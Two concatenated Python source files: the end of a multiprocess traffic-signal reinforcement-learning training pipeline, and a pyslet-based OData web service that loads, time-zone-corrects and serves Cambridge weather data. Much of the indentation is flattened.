print("Error occurs when WRITING pickles when down sampling for inter {0}".format(i))
print('traceback.format_exc():\n%s' % traceback.format_exc())
print("----------------------------")
except Exception as e:
# print("CANNOT READ %s"%path_to_pkl)
print("----------------------------")
print("Error occurs when READING pickles when down sampling for inter {0}, {1}".format(i, f_logging_data))
print('traceback.format_exc():\n%s' % traceback.format_exc())
print("----------------------------")
def downsample_for_system(self, path_to_log, dic_traffic_env_conf):
for i in range(dic_traffic_env_conf['NUM_INTERSECTIONS']):
self.downsample(path_to_log, i)
def construct_sample_multi_process(self, train_round, cnt_round, batch_size=200):
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
if batch_size > self.dic_traffic_env_conf['NUM_INTERSECTIONS']:
batch_size_run = self.dic_traffic_env_conf['NUM_INTERSECTIONS']
else:
batch_size_run = batch_size
process_list = []
for batch in range(0, self.dic_traffic_env_conf['NUM_INTERSECTIONS'], batch_size_run):
start = batch
stop = min(batch + batch_size, self.dic_traffic_env_conf['NUM_INTERSECTIONS'])
process_list.append(Process(target=self.construct_sample_batch, args=(cs, start, stop)))
for t in process_list:
t.start()
for t in process_list:
t.join()
def construct_sample_batch(self, cs, start,stop):
for inter_id in range(start, stop):
print("make construct_sample_wrapper for ", inter_id)
cs.make_reward(inter_id)
def run(self, multi_process=False):
best_round, bar_round = None, None
f_time = open(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"],"running_time.csv"),"w")
f_time.write("generator_time\tmaking_samples_time\tupdate_network_time\ttest_evaluation_times\tall_times\n")
f_time.close()
if self.dic_exp_conf["PRETRAIN"]:
if os.listdir(self.dic_path["PATH_TO_PRETRAIN_MODEL"]):
for i in range(self.dic_traffic_env_conf["NUM_AGENTS"]):
#TODO:only suitable for CoLight
shutil.copy(os.path.join(self.dic_path["PATH_TO_PRETRAIN_MODEL"],
"round_0_inter_%d.h5" % i),
os.path.join(self.dic_path["PATH_TO_MODEL"], "round_0_inter_%d.h5"%i))
else:
if not os.listdir(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"]):
for cnt_round in range(self.dic_exp_conf["PRETRAIN_NUM_ROUNDS"]):
print("round %d starts" % cnt_round)
process_list = []
# ============== generator =============
if multi_process:
for cnt_gen in range(self.dic_exp_conf["PRETRAIN_NUM_GENERATORS"]):
p = Process(target=self.generator_wrapper,
args=(cnt_round, cnt_gen, self.dic_path, self.dic_exp_conf,
self.dic_agent_conf, self.dic_traffic_env_conf, best_round)
)
print("before")
p.start()
print("end")
process_list.append(p)
print("before join")
for p in process_list:
p.join()
print("end join")
else:
for cnt_gen in range(self.dic_exp_conf["PRETRAIN_NUM_GENERATORS"]):
self.generator_wrapper(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
dic_agent_conf=self.dic_agent_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
best_round=best_round)
# ============== make samples =============
# make samples and determine which samples are good
train_round = os.path.join(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"], "train_round")
if not os.path.exists(train_round):
os.makedirs(train_round)
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
cs.make_reward()
if self.dic_exp_conf["MODEL_NAME"] in self.dic_exp_conf["LIST_MODEL_NEED_TO_UPDATE"]:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(0,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round))
p.start()
p.join()
else:
self.updater_wrapper(cnt_round=0,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round)
# train with aggregate samples
if self.dic_exp_conf["AGGREGATE"]:
if "aggregate.h5" in os.listdir("model/initial"):
shutil.copy("model/initial/aggregate.h5",
os.path.join(self.dic_path["PATH_TO_MODEL"], "round_0.h5"))
else:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(0,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round))
p.start()
p.join()
else:
self.updater_wrapper(cnt_round=0,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round)
self.dic_exp_conf["PRETRAIN"] = False
self.dic_exp_conf["AGGREGATE"] = False
# main training loop
for cnt_round in range(self.dic_exp_conf["NUM_ROUNDS"]):
print("round %d starts" % cnt_round)
round_start_time = time.time()
process_list = []
print("============== generator =============")
generator_start_time = time.time()
if multi_process:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
p = Process(target=self.generator_wrapper,
args=(cnt_round, cnt_gen, self.dic_path, self.dic_exp_conf,
self.dic_agent_conf, self.dic_traffic_env_conf, best_round)
)
print("before p")
p.start()
print("end p")
process_list.append(p)
print("before join")
for i in range(len(process_list)):
p = process_list[i]
print("generator %d to join" % i)
p.join()
print("generator %d finish join" % i)
print("end join")
else:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
self.generator_wrapper(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
dic_agent_conf=self.dic_agent_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
best_round=best_round)
generator_end_time = time.time()
generator_total_time = generator_end_time - generator_start_time
print("============== make samples =============")
# make samples and determine which samples are good
making_samples_start_time = time.time()
train_round = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "train_round")
if not os.path.exists(train_round):
os.makedirs(train_round)
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
cs.make_reward_for_system()
# EvaluateSample()
making_samples_end_time = time.time()
making_samples_total_time = making_samples_end_time - making_samples_start_time
print("============== update network =============")
update_network_start_time = time.time()
if self.dic_exp_conf["MODEL_NAME"] in self.dic_exp_conf["LIST_MODEL_NEED_TO_UPDATE"]:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(cnt_round,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round,
bar_round))
p.start()
print("update to join")
p.join()
print("update finish join")
else:
self.updater_wrapper(cnt_round=cnt_round,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round,
bar_round=bar_round)
if not self.dic_exp_conf["DEBUG"]:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
path_to_log = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "train_round",
"round_" + str(cnt_round), "generator_" + str(cnt_gen))
try:
self.downsample_for_system(path_to_log,self.dic_traffic_env_conf)
except Exception as e:
print("----------------------------")
print("Error occurs when downsampling for round {0} generator {1}".format(cnt_round, cnt_gen))
print("traceback.format_exc():\n%s"%traceback.format_exc())
print("----------------------------")
update_network_end_time = time.time()
update_network_total_time = update_network_end_time - update_network_start_time
print("============== test evaluation =============")
test_evaluation_start_time = time.time()
if multi_process:
p = Process(target=model_test.test,
args=(self.dic_path["PATH_TO_MODEL"], cnt_round, self.dic_exp_conf["RUN_COUNTS"], self.dic_traffic_env_conf, False))
p.start()
if self.dic_exp_conf["EARLY_STOP"]:
p.join()
else:
model_test.test(self.dic_path["PATH_TO_MODEL"], cnt_round, self.dic_exp_conf["RUN_COUNTS"], self.dic_traffic_env_conf, if_gui=False)
test_evaluation_end_time = time.time()
test_evaluation_total_time = test_evaluation_end_time - test_evaluation_start_time
print('============== early stopping =============')
if self.dic_exp_conf["EARLY_STOP"]:
flag = self.early_stopping(self.dic_path, cnt_round)
if flag == 1:
print("early stopping!")
print("training ends at round %s" % cnt_round)
break
print('============== model pool evaluation =============')
if self.dic_exp_conf["MODEL_POOL"] and cnt_round > 50:
if multi_process:
p = Process(target=self.model_pool_wrapper,
args=(self.dic_path,
self.dic_exp_conf,
cnt_round),
)
p.start()
print("model_pool to join")
p.join()
print("model_pool finish join")
else:
self.model_pool_wrapper(dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
cnt_round=cnt_round)
model_pool_dir = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "best_model.pkl")
if os.path.exists(model_pool_dir):
model_pool = pickle.load(open(model_pool_dir, "rb"))
ind = random.randint(0, len(model_pool) - 1)
best_round = model_pool[ind][0]
ind_bar = random.randint(0, len(model_pool) - 1)
flag = 0
while ind_bar == ind and flag < 10:
ind_bar = random.randint(0, len(model_pool) - 1)
flag += 1
# bar_round = model_pool[ind_bar][0]
bar_round = None
else:
best_round = None
bar_round = None
# downsample
if not self.dic_exp_conf["DEBUG"]:
path_to_log = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "test_round",
"round_" + str(cnt_round))
self.downsample_for_system(path_to_log, self.dic_traffic_env_conf)
else:
best_round = None
print("best_round: ", best_round)
print("Generator time: ",generator_total_time)
print("Making samples time:", making_samples_total_time)
print("update_network time:", update_network_total_time)
print("test_evaluation time:", test_evaluation_total_time)
print("round {0} ends, total_time: {1}".format(cnt_round, time.time()-round_start_time))
f_time = open(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"],"running_time.csv"),"a")
f_time.write("{0}\t{1}\t{2}\t{3}\t{4}\n".format(generator_total_time,making_samples_total_time,
update_network_total_time,test_evaluation_total_time,
time.time()-round_start_time))
f_time.close()
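# Illustrative construction of the pipeline (key names match the lookups made
# above; values and the remaining experiment/agent keys are placeholders):
#
#   dic_path = {
#       'PATH_TO_WORK_DIRECTORY': 'records/default',
#       'PATH_TO_MODEL': 'model/default',
#       'PATH_TO_PRETRAIN_WORK_DIRECTORY': 'records/pretrain',
#       'PATH_TO_PRETRAIN_MODEL': 'model/pretrain',
#       'PATH_TO_DATA': 'data/template',
#   }
#   dic_traffic_env_conf = {'SIMULATOR_TYPE': 'anon', 'NUM_INTERSECTIONS': 1, ...}
#   pipeline = Pipeline(dic_exp_conf, dic_agent_conf, dic_traffic_env_conf, dic_path)
#   pipeline.run(multi_process=True)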
|
weather.py
|
#! /usr/bin/env python
"""Creates an OData service from weather data"""
import io
import logging
import os
import os.path
import threading
import time
from wsgiref.simple_server import make_server
from pyslet import iso8601 as iso
from pyslet.http import client as http
from pyslet.odata2 import csdl as edm
from pyslet.odata2 import core as core
from pyslet.odata2 import metadata as edmx
from pyslet.odata2.memds import InMemoryEntityContainer
from pyslet.odata2.server import ReadOnlyServer
from pyslet.odata2.sqlds import SQLiteEntityContainer
from pyslet.py2 import output, to_text
# SAMPLE_DIR='small-sample'
SAMPLE_DIR = 'daily-text'
SAMPLE_DB = 'weather.db'
SERVICE_PORT = 8080
SERVICE_ROOT = "http://localhost:%i/" % SERVICE_PORT
def load_metadata(path=os.path.join(os.path.split(__file__)[0],
'weather_schema.xml')):
"""Loads the metadata file from the current directory."""
doc = edmx.Document()
with open(path, 'rb') as f:
doc.read(f)
return doc
def make_container(doc, drop=False, path=SAMPLE_DB):
if drop and os.path.isfile(path):
os.remove(path)
create = not os.path.isfile(path)
container = SQLiteEntityContainer(
file_path=path,
container=doc.root.DataServices['WeatherSchema.CambridgeWeather'])
if create:
container.create_all_tables()
return doc.root.DataServices['WeatherSchema.CambridgeWeather']
def make_mysql_container(doc, drop=False, create=False, host="localhost",
user="weather", password="password",
database="weather"):
import pyslet.mysqldbds as mysql
container = mysql.MySQLEntityContainer(
host=host, user=user, passwd=password, db=database,
container=doc.root.DataServices['WeatherSchema.CambridgeWeather'])
if drop:
container.drop_all_tables()
if create:
container.create_all_tables()
return doc.root.DataServices['WeatherSchema.CambridgeWeather']
def is_bst(t):
"""Returns True/False/Unknown if the timepoint t is in BST
This function uses the last Sunday in the month algorithm even
though most sources say that prior to 1996 the rule was different.
The only date of contention in this data set is 1995-10-22 which
should have a clock change but the data set clearly have a change on
1995-10-29, a week later."""
century, year, month, day = t.date.get_calendar_day()
if month < 3:
return False
elif month == 3:
if day < 24:
return False
# deal with switch to BST
century, decade, year, week, weekday = t.date.get_week_day()
if weekday == 7:
# Sunday - look deeper
hour, minute, second = t.time.get_time()
if hour <= 1:
return False
else:
return True
elif day + (7 - weekday) > 31:
# next Sunday's date is in April, we already changed
return True
else:
# next Sunday's date is in March, we haven't changed yet
return False
elif month < 10:
return True
elif month == 10:
if day < 24:
return True
# deal with switch to GMT
century, decade, year, week, weekday = t.date.get_week_day()
if weekday == 7:
# Sunday - look deeper
hour, minute, second = t.time.get_time()
if hour < 1:
return True
elif hour > 1:
return False
else:
return None # Ambiguous time
elif day + (7 - weekday) > 31:
# next Sunday's date is in November, we already changed
return False
else:
# next Sunday's date is in October, we haven't changed yet
return True
else:
return False
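# Worked example of the October branch above: on the last Sunday of October,
# times strictly before 01:00 are still BST (True), times from 02:00 onwards
# are GMT (False), and the 01:00 hour itself returns None because the clocks
# repeat it and the reading is ambiguous.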
def load_data_from_file(weather_data, f, year, month, day):
with weather_data.open() as collection:
while True:
line = f.readline().decode('ascii')
if len(line) == 0 or line.startswith('Date unknown.'):
break
elif line[0] == '#':
continue
data = line.split()
if not data:
continue
if len(data) < 11:
data = data + ['*'] * (11 - len(data))
for i in (1, 3, 5, 7, 8, 10):
try:
data[i] = float(data[i])
except ValueError:
data[i] = None
for i in (2, 4):
try:
data[i] = int(data[i])
except ValueError:
data[i] = None
data[6] = data[6].strip()
data_point = collection.new_entity()
hour, min = [int(i) for i in data[0].split(':')]
tvalue = iso.TimePoint(
date=iso.Date(century=year // 100, year=year %
100, month=month, day=day),
time=iso.Time(hour=hour, minute=min, second=0))
bst = is_bst(tvalue)
if bst is not False:
# assume BST for now, add the zone info and then shift to GMT
tvalue = tvalue.with_zone(
zdirection=1, zhour=1).shift_zone(zdirection=0)
data_point['TimePoint'].set_from_value(tvalue)
data_point['Temperature'].set_from_value(data[1])
data_point['Humidity'].set_from_value(data[2])
data_point['DewPoint'].set_from_value(data[3])
data_point['Pressure'].set_from_value(data[4])
data_point['WindSpeed'].set_from_value(data[5])
data_point['WindDirection'].set_from_value(data[6])
data_point['Sun'].set_from_value(data[7])
data_point['Rain'].set_from_value(data[8])
shour, smin = [int(i) for i in data[9].split(':')]
data_point['SunRainStart'].set_from_value(
iso.Time(hour=shour, minute=smin, second=0))
data_point['WindSpeedMax'].set_from_value(data[10])
try:
collection.insert_entity(data_point)
except edm.ConstraintError:
if bst is None:
# This was an ambiguous entry, the first one is in
# BST, the second one is in GMT as the clocks have
# gone back, so we shift forward again and then
# force the zone to GMT
tvalue = tvalue.shift_zone(
zdirection=1, zhour=1).with_zone(zdirection=0)
data_point['TimePoint'].set_from_value(tvalue)
logging.info(
"Auto-detecting switch to GMT at: %s", str(tvalue))
try:
collection.insert_entity(data_point)
except KeyError:
logging.error("Duplicate data point during BST/GMT "
"switching: %s", str(tvalue))
else:
logging.error(
"Unexpected duplicate data point: %s", str(tvalue))
def load_data(weather_data, dir_name):
for file_name in os.listdir(dir_name):
if not file_name[0:4].isdigit() or file_name[-1] == '~':
# ignore odd files and some editor backups
continue
logging.info(
"Loading data from file %s", os.path.join(dir_name, file_name))
year, month, day = [int(np) for np in file_name.split('_')]
with open(os.path.join(dir_name, file_name), 'r') as f:
load_data_from_file(weather_data, f, year, month, day)
def load_notes(weather_notes, file_name, weather_data):
with open(file_name, 'r') as f:
id = 1
with weather_notes.open() as collection:
with weather_data.open() as data:
while True:
line = f.readline()
if len(line) == 0:
break
elif line[0] == '#':
continue
note_words = line.split()
if note_words:
note = collection.new_entity()
note['ID'].set_from_value(id)
start = iso.TimePoint(
date=iso.Date.from_str(note_words[0]),
time=iso.Time(hour=0, minute=0, second=0))
note['StartDate'].set_from_value(start)
end = iso.TimePoint(
date=iso.Date.from_str(
note_words[1]).offset(days=1),
time=iso.Time(hour=0, minute=0, second=0))
note['EndDate'].set_from_value(end)
note['Details'].set_from_value(
' '.join(note_words[2:]))
collection.insert_entity(note)
# now find the data points that match
data.set_filter(
core.CommonExpression.from_str(
"TimePoint ge datetime'%s' and "
"TimePoint lt datetime'%s'" %
(to_text(start), to_text(end))))
for data_point in data.values():
# use values, not itervalues to avoid this bug
# in Python 2.7 http://bugs.python.org/issue10513
data_point['Note'].bind_entity(note)
data.update_entity(data_point)
id = id + 1
with weather_notes.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('StartDate desc'))
for e in collection.itervalues():
with e['DataPoints'].open() as affectedData:
output(
"%s-%s: %s (%i data points affected)" %
(to_text(e['StartDate'].value),
to_text(e['EndDate'].value),
e['Details'].value, len(affectedData)))
def dry_run():
doc = load_metadata()
InMemoryEntityContainer(
doc.root.DataServices['WeatherSchema.CambridgeWeather'])
weather_data = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.DataPoints']
weather_notes = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.Notes']
load_data(weather_data, SAMPLE_DIR)
load_notes(weather_notes, 'weathernotes.txt', weather_data)
return doc.root.DataServices['WeatherSchema.CambridgeWeather']


def test_model(drop=False):
"""Read and write some key value pairs"""
doc = load_metadata()
make_container(doc, drop)
weather_data = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.DataPoints']
weather_notes = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.Notes']
if drop:
load_data(weather_data, SAMPLE_DIR)
load_notes(weather_notes, 'weathernotes.txt', weather_data)
with weather_data.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('WindSpeedMax desc'))
collection.set_page(30)
for e in collection.iterpage():
note = e['Note'].get_entity()
if e['WindSpeedMax'] and e['Pressure']:
output(
"%s: Pressure %imb, max wind speed %0.1f knots "
"(%0.1f mph); %s" % (
to_text(e['TimePoint'].value), e['Pressure'].value,
e['WindSpeedMax'].value,
e['WindSpeedMax'].value * 1.15078,
note['Details'] if note is not None else ""))


def run_weather_server(weather_app=None):
"""Starts the web server running"""
server = make_server('', SERVICE_PORT, weather_app)
logging.info("HTTP server on port %i running" % SERVICE_PORT)
# Respond to requests until process is killed
server.serve_forever()


def run_weather_loader(container=None, max_load=30,
not_before="19950630T000000"):
"""Monitors the DTG website for new values
container
The EntityContainer containing the weather data.
max_load
The maximum number of days worth of data to load. When setting
up a new server this determines the rate at which the new server
will catch up.
This function is designed to be called once per day, it loads
historical data from the DTG website one day at a time up to a
maximum of max_load. If the data can't be loaded, e.g., because the
DTG site is not reachable, then the method backs off until it has
waited for approximately 1 hour after which it gives up. Therefore,
you should always set max_load greater than 1 to ensure that the
method catches up with the data after an outage.
The earliest date it will load is 30th June 1995, the latest date it
will load is yesterday."""
if container is None:
doc = load_metadata()
container = make_container(doc)
client = http.Client()
weather_data = container['DataPoints']
dtg = "http://www.cl.cam.ac.uk/research/dtg/weather/daily-text.cgi?%s"
not_before_point = iso.TimePoint.from_str(not_before)
with weather_data.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('TimePoint desc'))
sleep_interval = 60
collection.set_page(1)
last_point = list(collection.iterpage())
if last_point:
last_point = last_point[0]['TimePoint'].value
if last_point < not_before_point:
last_point = not_before_point
else:
last_point = not_before_point
next_day = last_point.date
n_loaded = 0
while n_loaded < max_load:
today = iso.TimePoint.from_now_utc().date
if next_day < today:
# Load in next_day
logging.info("Requesting data for %s", str(next_day))
century, year, month, day = next_day.get_calendar_day()
request = http.ClientRequest(dtg % str(next_day))
client.process_request(request)
if request.status == 200:
# process this file and move on to the next day
f = io.BytesIO(request.res_body)
load_data_from_file(
weather_data, f, century * 100 + year, month, day)
n_loaded += 1
next_day = next_day.offset(days=1)
if sleep_interval > 10:
sleep_interval = sleep_interval // 2
else:
# back off and try again
sleep_interval = sleep_interval * 2
else:
# we're done for today
client.idle_cleanup(0)
break
client.idle_cleanup(0)
if sleep_interval > 3600:
# site might be down, postpone
break
time.sleep(sleep_interval)


def main():
"""Executed when we are launched"""
doc = load_metadata()
make_container(doc)
server = ReadOnlyServer(serviceRoot=SERVICE_ROOT)
server.SetModel(doc)
t = threading.Thread(
target=run_weather_server, kwargs={'weather_app': server})
    t.daemon = True
t.start()
logging.info("Starting HTTP server on %s" % SERVICE_ROOT)
t.join()
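

# Illustrative helper added for documentation purposes; it is not part of
# the original weather sample.  It sketches how the running service could
# be queried with Pyslet's OData client, assuming the SERVICE_ROOT defined
# above is where the service is published.
def example_client_query(service_root=SERVICE_ROOT, max_points=5):
    """Prints a page of data points retrieved via the OData API.

    max_points is just an illustrative page size."""
    # local import keeps this optional sketch self-contained
    from pyslet.odata2.client import Client
    c = Client(service_root)
    with c.feeds['DataPoints'].open() as collection:
        collection.set_page(max_points)
        for dp in collection.iterpage():
            output("%s: %s" % (to_text(dp['TimePoint'].value),
                               dp['Temperature'].value))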


if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()